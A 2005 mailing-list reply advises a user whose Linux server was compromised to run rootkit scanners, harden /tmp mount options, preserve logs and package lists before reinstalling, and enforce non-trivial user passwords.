help i've been hacked. :(

Sat Aug 20 19:04:20 UTC 2005

Chris,

The first thing to do is download and run the chkrootkit and rkhunter
programs.  It It sounds like you might have a rootkit installed, and these
programs may be able to identify which one you have.  Honestly, this
information may turn out not to be too useful since you are already
cracked, but you should get these programs anyway and start running them
on a regular basis.  They can at least help you to quickly notice if
something like this ever happens again.

chkrootkit: http://www.chkrootkit.org/
rkhunter: http://www.rootkit.nl/projects/rootkit_hunter.html

As for how you were cracked, don't assume that it was through an unpatched
vulnerability.  I work for a very large ISP and I see cracked servers a
few times a week and many break ins are done by exploiting improperly
configured security.  For example, check to see if your /tmp directory is
mounted with the noexec and nosuid options.  Just enabling those options
can prevent a lot of cracks since many attacks rely on being able to
exploit a weak cgi script to upload a program into /tmp and run it.

And, of course, cgi scripts are frequently a way for attackers to gain
access to your system.  I would suggest that before you reinstall, you
should save copies of all of your log files, and also save the output of
the "rpm -qa" command to get a list of all the installed software on your
system.  You can use the list to see if you had any versions of packages
with known security holes, and you can use the logs, especially the web
server logs, to see if there were any strange web requests around the time
the crack occurred, such as someone running a cgi-script with lot's of
garbage characters on the request line.

Another way attackers can get a foot in the door is by scanning your
system for users who have set their passwords to be the same as their
usernames.  You would not believe how common this is, and once the
attacker has a login to your system - any login - he or she can usually
find some way to gain further access, and maybe even root.  I don't know
if you are doing shared hosting on your server, but if you are you should
make sure that all of your users pick secure (or at least non-trivial)
passwords.

I expect you will want to get the server up and running again ASAP and
won't be spending a lot of time on disecting the old drive, so just be
sure to keep on eye on the new system, log everything, and scan it
frequently.

Good luck!  Getting cracked like this is no fun at all and can really cost
money if your business depends on it.  Try to use this opportunity to
learn as much as you can about security so you can prevent this from
happening again.

For more info, you might try asking on the message boards At EV1
(http://forum.ev1servers.net) and WebHosting Talk
(http://www.webhostingtalk.com).  The people on these boards are mostly
running webservers on RedHat and they have good advice to offer. 
(Disclaimer:  I work for EV1.)

Eris Caffee